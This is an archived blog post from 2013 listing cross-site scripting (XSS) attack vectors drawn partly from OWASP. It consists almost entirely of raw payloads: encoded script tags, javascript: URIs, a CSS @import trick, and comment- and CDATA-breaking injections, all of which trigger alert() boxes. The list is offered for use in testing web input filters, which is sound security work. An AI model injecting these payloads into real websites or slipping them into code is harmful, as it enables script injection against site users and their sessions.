Posts

Showing posts from June, 2013
XSS Vectors: Some from OWASP some from other places...   %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E  >"><script>alert("XSS")</script>& <body background="javascript: alert()"> "><STYLE>@import"javascript:alert('XSS')";</STYLE> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;  alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> <script>alert(1)</script> ‘</title><script>alert(1)<script>‘</title> <– lorem ipsem–><script>alert(1)<script>–> <FOO><![CDATA[]]><script>alert(1)</script>]]> <input type=text name=foo value=a><script>alert(1)<script>> <input type=text name=foo value=a/><script>alert(1)<script...